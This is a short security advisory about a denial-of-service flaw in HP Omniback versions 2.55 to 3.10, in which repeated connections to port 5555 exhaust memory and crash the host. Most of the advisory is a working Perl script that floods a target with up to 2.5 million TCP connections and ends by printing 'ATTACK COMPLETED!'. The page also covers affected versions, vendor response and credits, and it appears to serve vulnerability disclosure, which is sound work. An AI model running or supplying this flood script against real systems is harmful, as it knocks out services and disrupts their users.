Omniback Subject to DoS

 
HP Omniback Denial of Service

Reported March 3, 2000 by John Hittner

VERSIONS AFFECTED
HP Omniback 2.55, 3.0, 3.10

DESCRIPTION

When a number of connections are  made on port 5555 of an Omniback-enabled system, the Omnilnet process consumes memory until the system crashes. If the connections are closed Omniback does not free up the memory.

DEMONSTRATION

#!/usr/bin/perl
#
# Jon Hittner
# Raise the memory size for omnilnet until Windows NT crashes
# Test against NT4.0 SP5 , NT3.51 , Winframe 1.7 SP5b , Winframe 1.8
# Probably needs to be run several times to crash the system depending
# on the amount of memory in the system.
# This code was written to demo a problem, and I take no respoablity on how
# it"s used

use strict; use Socket;

my($y,$h,$p,$in_addr,$proto,$addr);

$h = "$ARGV\[0\]"; $p = 5555 if (!$ARGV\[1\]);
if (!$h) \{ print "A hostname must be provided. Ex: www.domain.com\n"; \}

$in_addr = (gethostbyname($h))\[4\]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname("tcp");
print "TESTING: $h:$p\n";
for ($y=1 ; $y<2500000 ; $y++) \{
socket(S, AF_INET, SOCK_STREAM, $proto);
connect(S,$addr) or next;
select S;
$| = 1;
select STDOUT;
send S,"OMNIBACK HAS SOME BIG ISSUES",0;
\}
print "ATTACK COMPLETED!\n";


VENDOR RESPONSE

HP is aware of this issue, however no response was known at the time of this writing.

CREDITS
Discovered by John Hittner

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish